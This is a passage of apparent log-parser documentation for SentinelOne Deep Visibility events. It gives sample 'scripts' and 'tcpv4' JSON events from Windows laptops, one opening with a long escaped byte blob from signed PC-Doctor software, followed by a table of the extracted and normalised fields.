u5328\\u0002\\u2a06\\u0222\\u2803\\u00f2\\u0600\\u1e2a\\u2802\\u0253\\u0600\\u1e2a\\u7b02\\u00cd\\u0400\\u222a\\u0302\\ucd7d\\u0000\\u2a04\\u021e\\uce7b\\u0000\\u2a04\\u0222\\u7d03\\u00ce\\u0400\\u1e2a\\u7b02\\u00cf\\u0400\\u222a\\u0302\\ucf7d\\u0000\\u2a04\\u3013\\u00031\\u0000v\\u1100\\u2802\\u0261\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u6328\\u0002\\u0606\\u956f\\u0000\\u160a\\u0732\\u2802\\u0254\\u0600\\u162a\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u7b02\\u00d0\\u0400\\u222a\\u0302\\ud07d\\u0000\\u2a04\\u021e\\ud17b\\u0000\\u2a04\\u0222\\u7d03\\u00d1\\u0400*\\u3013\\u00030\\u0000v\\u1100\\u2802\\u0267\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u6928\\u0002\\u0606\\u946f\\u0000\\u2c0a\\u0207\\u5428\\u0002\\u2a06\\u2a16\\u021e\\u5e28\\u0002\\u2a06\\u021e\\ud27b\\u0000\\u2a04\\u0222\\u7d03\\u00d2\\u0400\\u1e2a\\u7b02\\u00d3\\u0400\\u222a\\u0302\\ud37d\\u0000\\u2a04\\u0000\\u3013\\u00033\\u0000w\\u1100\\u2802\\u026f\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0b06\\u0207\\u6d28\\u0002\\u0606\\u956f\\u0000\\u160a\\u072f\\u2802\\u0254\\u0600\\u162a\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u2802\\u025e\\u0600\\u1e2a\\u7b02\\u00d4\\u0400\\u222a\\u0302\\ud47d\\u0000\\u2a04\\u021e\\ud57b\\u0000\\u2a04\\u0222\\u7d03\\u00d5\\u0400*\\u0000\\u3013\\u00030\\u0000v\\u1100\\u2802\\u0276\\u0600\\u032d\\u2b1a\\u1b01\\u020a\\u5f28\\u0002\\u0306\\u486f\\b\\u0206\\u7428\\u0002\\u0606\\u946f\\u0000\\u2d0a\\u0207\\u5428\\u0002\\u2a06\\u2a16\\u0222\\u2803\\u0280\\u0600\\u322a\\uf57e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02f6\\u0400\\u2802\\u0280\\u0600\\u322a\\uf77e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02f8\\u0400\\u2802\\u0280\\u0600\\u322a\\uf97e\\u0002\\u0204\\u8028\\u0002\\u2a06\\u7e32\\u02fa\\u0400\\u2802\\u0280\\u0600*\\u3013\\u0003@\\u0000x\\u1100\\u2503\\u062d\\u7e26[\\u0a00\\ubc28\\u0001\\u0a0a\\u2806\\u01bd\\u0a00\\u082d\\u2806\\u0b48\\u0600\\u052b\\ud67e\\u0000\\u0b04\\u0207\\u8373\\u0002\\u0c06\\u2c03\\u080d\\ua972.\\u0370\\u8f6f\\u0002\\u2606\\u2a08\\u282e\\u0b43\\u0600\\ud680\\u0000\\u2a04\\u0236\\u7e03\\u02f6\\u0400\\u8328\\u0002\\u2a06\\u0000\\u3013\\u0003`\\u0000y\\u1100\\u2802'\\u0a00\\u2d03\\u720b\\u065b\\u7000\\u2073\\u0001\\u7a0a\\u1404\\u2328\\u000b\\u2c06\\u720b\\u2ec7\\u7000\\u2073\\u0001\\u7a0a\\u0302\\ufffd\\u0204\\ud473\\b\\u0a06\\u0406\\ufffd\\b\\u0606\\u6f03\\u02b0\\u0600\\ue76f\\b\\u0606\\u3328\\u0010\\u6f06\\u1032\\u0600\\ufffd\\u0606\\ud77d\\u0000\\u2a04\\u021e\\ud77b\\u0000\\u2a04\\u023a\\ud77b\\u0000\\u0304\\ue56f\\b\\u0206\\u8a2a\\u1403\\u2328\\u000b\\u2c06\\u720b\\u2ec7\\u7000\\u2073\\u0001\\u7a0a\\u7b02\\u00d7\\u0400\\u6f03\\u08dd\\u0600\\u2a02\\u023a\\ud77b\\u0000\\u0304\\ue76f\\b\\u0206\\u3a2a\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u2a02\\u3013\\u0004%\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d17\\u0004\\u0100\\u060a\\u0416\\u06a2\\uec6f\\b\\u0206*\\u0000\\u3013\\u0004)\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d18\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\uec6f\\b\\u0206*\\u0000\\u3013\\u0004.\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d19\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\u0e18\\ua204\\u6f06\\u08ec\\u0600\\u2a02\\u0000\\u3013\\u00043\\u0000\\u0013\\u1100\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u8d1a\\u0004\\u0100\\u060a\\u0416\\u06a2\\u0517\\u06a2\\u0e18\\ua204\\u1906\\u050e\\u06a2\\uec6f\\b\\u0206\\u6a2a\\u7b02\\u00d7\\u0400\\u6f03\\u08ea\\u0600\\u7b02\\u00d7\\u0400\\u6f04\\u08ec\\u0600\\u2a02\\u029a\\ud77b\\u0000\\u0304\\uee6f\\b\\u0206\\ud77b\\u0000\\u0404\\uea6f\\b\\u0206\\ud77b\\u0000\\u0504\\uec6f\\b\\u0206\\u8a2a\\u2d03\\u720b\\u16ae\\u7000\\u2073\\u0001\\u7a0a\\u7b02\\u00d7\\u0400\\uf16f\\b\\u0306\\u6f04\\u01be\\u0a00\\u2a02\\u301b\\u0004X\\u0000z\\u1100\\u2d03\\u720b\\u2ed9\\u7000\\u2073\\u0001\\u7a0a\\u6f03\\u01bf\\u0a00\\u026f\\u0000\\u0b0a\\u1f2b\\u6f07\\u0005\\u0a00\\u020a\\ud77b\\u0000\\u6f04\\u08f1\\u0600\\u0306\\u6f06\\u01c0\\u0a00\\ube6f\\u0001\\u070a\\u2a6f\\u0000\\u2d0a\\ufffd\\u0711\\u0a75\\u0000\\u0c01\\u2c08\\u0806\\u036f\\u0000\\ufffd\\u2a02\\u1001\\u0000\\u0002\\u001a\\u452b\\u1100\\u0000\\u0000\\u023a\\ud77b\\u0000\\u0304\\ufffd\\u0206\\u3e2a\\u7b02\\u00d7\\u0400\\u0403\\ufc6f\\b\\u0206*\\u3003\\u0003G\\u0000\\u0000\\u0000\\u2c03\\u020d\\uef72.\\u0370\\u8f28\\u0002\\u2606\\u2c04\\u020d\\ua972.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u0212\\u1172/\\u0570\\ud08c\\u0000\\u2801\\u028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u3003\\u0003U\\u0000\\u0000\\u0000\\u2c03\\u0308\\uc16f\\u0001\\u2d0a\\u2a01\\u2c04\\u020d\\uef72.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u020d\\ua972.\\u0570\\u8f28\\u0002\\u2606\\u040e\\u132c\\u7202\\u2f11\\u7000\\u040e\\ud08c\\u0000\\u2801\\u028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u0000\\u3003\\u0003M\\u0000\\u0000\\u0000\\u2d03\\u2a01\\u2c04\\u020d\\uef72.\\u0470\\u8f28\\u0002\\u2606\\u2c05\\u020d\\ua972.\\u0570\\u8f28\\u0002\\u2606\\u040e\\u132c\\u7202\\u2f11\\u7000\\u040e\\ud08c\\u0000\\u2801\\u028f\\u0600\\u0226\\ufffd\\u0204\\ud77b\\u0000\\u6f04\\u02b3\\u0600*\\u0000\\u3013\\u0002\\n\\u0000{\\u1100\\u0302\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f5\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f6\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f7\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f8\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02f9\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0000\\u3013\\u0002\\u000e\\u0000{\\u1100\\u7e02\\u02fa\\u0400\\u8373\\u0002\\u0a06\\u2a06\\u0222\\u2803\\u02a4\"}", - "event": { - "action": "scripts", - "start": "2021-09-16T14:22:42.798000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFQFVBJWAT35E5D075MQ1408", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "scripts" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 1, - "file_creation": 3, - "file_deletion": 3, - "file_modification": 33, - "module_load": 224, - "net_conn_out": 3, - "registry_modification": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "node": { - "key": "FBFFF74AA755328C" - }, - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC." - } - }, - "size_bytes": "5518152", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_TRUE", - "node": { - "key": "35A565744E7A266A" - }, - "parent": { - "counters": { - "cross_process": 2, - "cross_process_dup_process_handle": 2, - "file_creation": 1, - "file_deletion": 1, - "file_modification": 32, - "model_child_process": 1, - "module_load": 237, - "net_conn_out": 2, - "os_child_process": 1, - "registry_modification": 3 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe", - "node": { - "key": "DED9F9357E5C5C30" - }, - "signature": { - "signed": { - "identity": "PC-DOCTOR, INC." - } - }, - "size_bytes": "5518152", - "start": "1631802160011" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_TRUE", - "node": { - "key": "04DEDAAF23E16398" - }, - "parent": { - "node": { - "key": "EDA8D6AB348AAE7D" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B21DD2505AAA5F2" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B21DD2505AAA5F2" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "script": { - "app_name": "DotNet" - } - }, - "file": { - "size": 612864 - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe\" /child", - "executable": "C:\\ProgramData\\PCDr\\CSAW\\CSAW_Child.exe", - "hash": { - "md5": "423050654da76dab9c2866ba3c13ce38", - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - }, - "name": "CSAW_Child.exe", - "parent": { - "command_line": "\"C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries\\CSAW.exe\" /NA /noui", - "hash": { - "md5": "423050654da76dab9c2866ba3c13ce38", - "sha1": "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "sha256": "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - }, - "name": "csaw.exe", - "pid": 1780, - "working_directory": "C:\\Users\\user.name.CORP\\AppData\\Roaming\\PCDr\\Update\\Binaries" - }, - "pid": 14832, - "start": "2021-09-16T14:22:42.671000Z", - "working_directory": "C:\\ProgramData\\PCDr\\CSAW" - }, - "related": { - "hash": [ - "423050654da76dab9c2866ba3c13ce38", - "bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d", - "e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "tcpv4.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 51, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"620565A45ABA475FB419254BE2152CA4\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631630518385\"}, \"event_type\": \"tcpv4\", \"trueContext\": {\"key\": {\"value\": \"C5307F702A45841C\"}}, \"source\": {\"node\": {\"key\": {\"value\": \"CE27A4E72749E6F2\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"88D134761AF47342\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"64262984\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT CORPORATION\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"c20704e15fa16fd333cf61c5611dc74299284d7d\", \"sha256\": \"02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4\", \"md5\": \"3dcef51688df91a37bc07d8a261a9427\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE\\\" /vu \\\"C:\\\\Users\\\\l.maoui\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\GMYOE03V\\\\S36 -2021.xlsx\\\"\", \"fullPid\": {\"pid\": 19376, \"startTime\": {\"millisecondsSinceEpoch\": \"1631603628039\"}}, \"user\": {\"name\": \"CORP\\\\l.maoui\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6168\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"9C0BFCE246E832C2\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Microsoft Excel\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 10, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"C5307F702A45841C\"}}, \"counters\": {\"moduleLoad\": 1775, \"fileCreation\": 136, \"fileDeletion\": 63, \"fileModification\": 436, \"netConnOut\": 261, \"registryModification\": 7653, \"dnsLookups\": 108}}, \"sourceAddress\": {\"address\": \"10.26.8.27\", \"port\": 50965}, \"destinationAddress\": {\"address\": \"52.182.143.208\", \"port\": 443}, \"direction\": \"OUTGOING\", \"status\": \"SUCCESS\"}", - "event": { - "action": "tcpv4", - "start": "2021-09-14T14:41:58.385000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 51, - "trace_id": "620565A45ABA475FB419254BE2152CA4", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "tcpv4" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 108, - "file_creation": 136, - "file_deletion": 63, - "file_modification": 436, - "module_load": 1775, - "net_conn_out": 261, - "registry_modification": 7653 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "node": { - "key": "88D134761AF47342" - }, - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION" - } - }, - "size_bytes": "64262984", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "CE27A4E72749E6F2" - }, - "parent": { - "node": { - "key": "9C0BFCE246E832C2" - } - }, - "root": "E_TRUE", - "session_id": 10, - "true_context": { - "key": "C5307F702A45841C" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - } - }, - "true_context": { - "key": "C5307F702A45841C" - } - }, - "destination": { - "address": "52.182.143.208", - "ip": "52.182.143.208", - "port": 443 - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "network": { - "direction": "outbound" - }, - "process": { - "command_line": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" /vu \"C:\\Users\\l.maoui\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\GMYOE03V\\S36 -2021.xlsx\"", - "executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", - "hash": { - "md5": "3dcef51688df91a37bc07d8a261a9427", - "sha1": "c20704e15fa16fd333cf61c5611dc74299284d7d", - "sha256": "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4" - }, - "name": "EXCEL.EXE", - "pid": 19376, - "start": "2021-09-14T07:13:48.039000Z", - "title": "Microsoft Excel", - "working_directory": "C:\\Program Files\\Microsoft Office\\root\\Office16" - }, - "related": { - "hash": [ - "02cbdab1431442fbaa216a9361d3127c1de5a247db279aba9a4df421b973bdf4", - "3dcef51688df91a37bc07d8a261a9427", - "c20704e15fa16fd333cf61c5611dc74299284d7d" - ], - "ip": [ - "10.26.8.27", - "52.182.143.208" - ], - "user": [ - "CORP\\l.maoui" - ] - }, - "source": { - "address": "10.26.8.27", - "ip": "10.26.8.27", - "port": 50965 - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6168", - "name": "CORP\\l.maoui" - } - } - - ``` - - - - - -### Extracted Fields - -The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. - -| Name | Type | Description | -| ---- | ---- | ---------------------------| -|`agent.version` | `keyword` | Version of the agent. | -|`deepvisibility.agent.managment_url` | `keyword` | | -|`deepvisibility.agent.seq_id` | `long` | | -|`deepvisibility.agent.trace_id` | `keyword` | | -|`deepvisibility.agent.uuid` | `keyword` | | -|`deepvisibility.dns.answers.results` | `keyword` | | -|`deepvisibility.event.type` | `keyword` | | -|`deepvisibility.file.is_kernel_module` | `boolean` | Whether or not the file is part of the kernel | -|`deepvisibility.file.location` | `keyword` | | -|`deepvisibility.file.node.key` | `keyword` | | -|`deepvisibility.host.os.revision` | `keyword` | | -|`deepvisibility.indicator.category` | `keyword` | | -|`deepvisibility.indicator.classification` | `keyword` | | -|`deepvisibility.indicator.description` | `keyword` | | -|`deepvisibility.indicator.id` | `keyword` | | -|`deepvisibility.indicator.long_description` | `keyword` | | -|`deepvisibility.indicator.metadata` | `keyword` | | -|`deepvisibility.indicator.name` | `keyword` | | -|`deepvisibility.indicator.tactics` | `object` | | -|`deepvisibility.process.counters.cross_process` | `long` | | -|`deepvisibility.process.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.counters.dns_lookups` | `long` | | -|`deepvisibility.process.counters.file_creation` | `long` | | -|`deepvisibility.process.counters.file_deletion` | `long` | | -|`deepvisibility.process.counters.file_modification` | `long` | | -|`deepvisibility.process.counters.model_child_process` | `long` | | -|`deepvisibility.process.counters.module_load` | `long` | | -|`deepvisibility.process.counters.net_conn_out` | `long` | | -|`deepvisibility.process.counters.os_child_process` | `long` | | -|`deepvisibility.process.counters.registry_modification` | `long` | | -|`deepvisibility.process.desired_access` | `long` | Process desired access | -|`deepvisibility.process.excluded` | `keyword` | | -|`deepvisibility.process.executable.is_dir` | `keyword` | | -|`deepvisibility.process.executable.name` | `keyword` | | -|`deepvisibility.process.executable.node.key` | `keyword` | | -|`deepvisibility.process.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.executable.start` | `keyword` | | -|`deepvisibility.process.family` | `keyword` | | -|`deepvisibility.process.integrity_level` | `keyword` | | -|`deepvisibility.process.interactive` | `keyword` | | -|`deepvisibility.process.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.is_wow64` | `keyword` | | -|`deepvisibility.process.node.key` | `keyword` | | -|`deepvisibility.process.parent.counters.cross_process` | `long` | | -|`deepvisibility.process.parent.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.parent.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.parent.counters.dns_lookups` | `long` | | -|`deepvisibility.process.parent.counters.file_creation` | `long` | | -|`deepvisibility.process.parent.counters.file_deletion` | `long` | | -|`deepvisibility.process.parent.counters.file_modification` | `long` | | -|`deepvisibility.process.parent.counters.model_child_process` | `long` | | -|`deepvisibility.process.parent.counters.module_load` | `long` | | -|`deepvisibility.process.parent.counters.net_conn_out` | `long` | | -|`deepvisibility.process.parent.counters.os_child_process` | `long` | | -|`deepvisibility.process.parent.counters.registry_modification` | `long` | | -|`deepvisibility.process.parent.excluded` | `keyword` | | -|`deepvisibility.process.parent.executable.is_dir` | `keyword` | | -|`deepvisibility.process.parent.executable.name` | `keyword` | | -|`deepvisibility.process.parent.executable.node.key` | `keyword` | | -|`deepvisibility.process.parent.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.parent.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.parent.executable.start` | `keyword` | | -|`deepvisibility.process.parent.family` | `keyword` | | -|`deepvisibility.process.parent.integrity_level` | `keyword` | | -|`deepvisibility.process.parent.interactive` | `keyword` | | -|`deepvisibility.process.parent.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.parent.is_wow64` | `keyword` | | -|`deepvisibility.process.parent.node.key` | `keyword` | | -|`deepvisibility.process.parent.parent.node.key` | `keyword` | | -|`deepvisibility.process.parent.root` | `keyword` | | -|`deepvisibility.process.parent.session_id` | `long` | | -|`deepvisibility.process.parent.true_context.key` | `keyword` | | -|`deepvisibility.process.parent.user.sid` | `keyword` | | -|`deepvisibility.process.relations` | `keyword` | Relations between source and target | -|`deepvisibility.process.root` | `keyword` | | -|`deepvisibility.process.session_id` | `long` | | -|`deepvisibility.process.target.command_line` | `keyword` | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | -|`deepvisibility.process.target.counters.cross_process` | `long` | | -|`deepvisibility.process.target.counters.cross_process_dup_process_handle` | `long` | | -|`deepvisibility.process.target.counters.cross_process_dup_thread_handle` | `long` | | -|`deepvisibility.process.target.counters.dns_lookups` | `long` | | -|`deepvisibility.process.target.counters.file_creation` | `long` | | -|`deepvisibility.process.target.counters.file_deletion` | `long` | | -|`deepvisibility.process.target.counters.file_modification` | `long` | | -|`deepvisibility.process.target.counters.model_child_process` | `long` | | -|`deepvisibility.process.target.counters.module_load` | `long` | | -|`deepvisibility.process.target.counters.net_conn_out` | `long` | | -|`deepvisibility.process.target.counters.os_child_process` | `long` | | -|`deepvisibility.process.target.counters.registry_modification` | `long` | | -|`deepvisibility.process.target.excluded` | `keyword` | | -|`deepvisibility.process.target.executable` | `keyword` | Absolute path to the process executable. | -|`deepvisibility.process.target.executable.is_dir` | `keyword` | | -|`deepvisibility.process.target.executable.name` | `keyword` | | -|`deepvisibility.process.target.executable.node.key` | `keyword` | | -|`deepvisibility.process.target.executable.signature.signed.identity` | `keyword` | | -|`deepvisibility.process.target.executable.size_bytes` | `keyword` | | -|`deepvisibility.process.target.executable.start` | `keyword` | | -|`deepvisibility.process.target.family` | `keyword` | | -|`deepvisibility.process.target.hash.md5` | `keyword` | MD5 hash. | -|`deepvisibility.process.target.hash.sha1` | `keyword` | SHA1 hash. | -|`deepvisibility.process.target.hash.sha256` | `keyword` | SHA256 hash. | -|`deepvisibility.process.target.integrity_level` | `keyword` | | -|`deepvisibility.process.target.interactive` | `keyword` | | -|`deepvisibility.process.target.is_redirected_command_processor` | `keyword` | | -|`deepvisibility.process.target.is_wow64` | `keyword` | | -|`deepvisibility.process.target.name` | `keyword` | Process name. | -|`deepvisibility.process.target.node.key` | `keyword` | | -|`deepvisibility.process.target.parent.node.key` | `keyword` | | -|`deepvisibility.process.target.pid` | `long` | Process id. | -|`deepvisibility.process.target.root` | `keyword` | | -|`deepvisibility.process.target.session_id` | `long` | | -|`deepvisibility.process.target.start` | `date` | The time the process started. | -|`deepvisibility.process.target.true_context.key` | `keyword` | | -|`deepvisibility.process.target.user.sid` | `keyword` | | -|`deepvisibility.process.target.working_directory` | `keyword` | The working directory of the process. | -|`deepvisibility.process.true_context.key` | `keyword` | | -|`deepvisibility.process.user.sid` | `keyword` | | -|`deepvisibility.registry.export_path` | `keyword` | | -|`deepvisibility.registry.import_path` | `keyword` | | -|`deepvisibility.registry.new.value_type` | `keyword` | | -|`deepvisibility.registry.old.data.bytes` | `keyword` | | -|`deepvisibility.registry.old.data.strings` | `keyword` | | -|`deepvisibility.registry.old.key_name` | `keyword` | | -|`deepvisibility.registry.old.value_type` | `keyword` | | -|`deepvisibility.registry.security_information` | `long` | | -|`deepvisibility.registry.value_type` | `keyword` | | -|`deepvisibility.scheduled_task.name` | `keyword` | Scheduled task name | -|`deepvisibility.scheduled_task.trigger_type` | `long` | Scheduled task trigger type | -|`deepvisibility.script.app_name` | `keyword` | | -|`deepvisibility.true_context.key` | `keyword` | | -|`destination.ip` | `ip` | IP address of the destination. | -|`destination.port` | `long` | Port of the destination. | -|`dll.name` | `keyword` | Name of the library. | -|`dll.path` | `keyword` | Full file path of the library. | -|`dns.question.name` | `keyword` | The name being queried. | -|`event.action` | `keyword` | The action captured by the event. | -|`event.start` | `date` | event.start contains the date when the event started or when the activity was first observed. | -|`file.code_signature.exists` | `boolean` | Boolean to capture if a signature is present. | -|`file.code_signature.subject_name` | `keyword` | Subject name of the code signer | -|`file.code_signature.valid` | `boolean` | Boolean to capture if the digital signature is verified against the binary content. | -|`file.created` | `date` | File creation time. | -|`file.extension` | `keyword` | File extension, excluding the leading dot. | -|`file.hash.md5` | `keyword` | MD5 hash. | -|`file.hash.sha1` | `keyword` | SHA1 hash. | -|`file.hash.sha256` | `keyword` | SHA256 hash. | -|`file.name` | `keyword` | Name of the file including the extension, without the directory. | -|`file.owner` | `keyword` | File owner's username. | -|`file.path` | `keyword` | Full path to the file, including the file name. | -|`file.size` | `long` | File size in bytes. | -|`file.type` | `keyword` | File type (file, dir, or symlink). | -|`file.uid` | `keyword` | The user ID (UID) or security identifier (SID) of the file owner. | -|`host.name` | `keyword` | Name of the host. | -|`host.os.family` | `keyword` | OS family (such as redhat, debian, freebsd, windows). | -|`host.os.name` | `keyword` | Operating system name, without the version. | -|`host.type` | `keyword` | Type of host. | -|`http.request.method` | `keyword` | HTTP request method. | -|`network.direction` | `keyword` | Direction of the network traffic. | -|`process.code_signature.exists` | `boolean` | Boolean to capture if a signature is present. | -|`process.code_signature.subject_name` | `keyword` | Subject name of the code signer | -|`process.code_signature.valid` | `boolean` | Boolean to capture if the digital signature is verified against the binary content. | -|`process.command_line` | `keyword` | | -|`process.executable` | `keyword` | Absolute path to the process executable. | -|`process.exit_code` | `long` | The exit code of the process. | -|`process.hash.md5` | `keyword` | MD5 hash. | -|`process.hash.sha1` | `keyword` | SHA1 hash. | -|`process.hash.sha256` | `keyword` | SHA256 hash. | -|`process.name` | `keyword` | Process name. | -|`process.parent.command_line` | `wildcard` | Full command line that started the process. | -|`process.parent.executable` | `keyword` | Absolute path to the process executable. | -|`process.parent.hash.md5` | `keyword` | MD5 hash. | -|`process.parent.hash.sha1` | `keyword` | SHA1 hash. | -|`process.parent.hash.sha256` | `keyword` | SHA256 hash. | -|`process.parent.name` | `keyword` | Process name. | -|`process.parent.pid` | `long` | Process id. | -|`process.parent.start` | `date` | The time the process started. | -|`process.parent.title` | `keyword` | Process title. | -|`process.parent.working_directory` | `keyword` | The working directory of the process. | -|`process.pid` | `long` | Process id. | -|`process.start` | `date` | The time the process started. | -|`process.title` | `keyword` | Process title. | -|`process.working_directory` | `keyword` | The working directory of the process. | -|`registry.data.bytes` | `keyword` | Original bytes written with base64 encoding. | -|`registry.data.strings` | `wildcard` | List of strings representing what was written to the registry. | -|`registry.path` | `keyword` | Full path, including hive, key and value | 